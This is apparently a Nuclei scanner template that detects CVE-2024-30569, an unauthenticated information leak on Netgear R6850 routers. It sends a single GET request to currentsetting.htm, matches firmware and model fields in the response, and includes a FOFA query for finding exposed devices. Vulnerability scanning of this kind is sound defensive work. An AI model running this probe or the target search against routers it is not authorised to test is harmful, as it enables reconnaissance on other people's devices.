id: CVE-2024-30569

info:
  name: Netgear R6850 - Information Disclosure
  author: ritikchaddha
  severity: high
  description: |
    Netgear R6850 router firmware version V1.1.0.88 contains an information leakage vulnerability in the currentsetting.htm page.This hidden interface is not protected by authentication, allowing unauthenticated attackers to access sensitive informationsuch as firmware version, model details, connection status, and other system configuration data.
  impact: |
    Attackers can access sensitive system information from the Netgear R6850 router.
  remediation: |
    Update Netgear R6850 firmware to a version that patches the information disclosure vulnerability.
  reference:
    - https://github.com/funny-mud-peee/IoT-vuls/blob/main/netgear%20R6850/Info%20Leak%20in%20Netgear-R6850%EF%BC%88currentsetting.htm%EF%BC%89.md
    - https://nvd.nist.gov/vuln/detail/CVE-2024-30569
    - https://www.netgear.com/about/security/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-30569
    cwe-id: CWE-200
    epss-score: 0.28583
    epss-percentile: 0.96618
    cpe: cpe:2.3:o:netgear:r6850_firmware:1.1.0.88:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: netgear
    product: r6850_firmware
    fofa-query: app="NETGEAR" && "R6850"
  tags: cve,cve2024,netgear,router,exposure,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/currentsetting.htm"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Firmware="
          - "LoginMethod="
          - "Model="
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402205ad3496b1149b7f979c17e275ec84f3c9c9aa9ce7a1511815715b2473671a91002200b4f9040b914882b46032dadf9866d2ddb633d083b3084504fd13312c16927b1:922c64590222798bb761d5b6d8e72950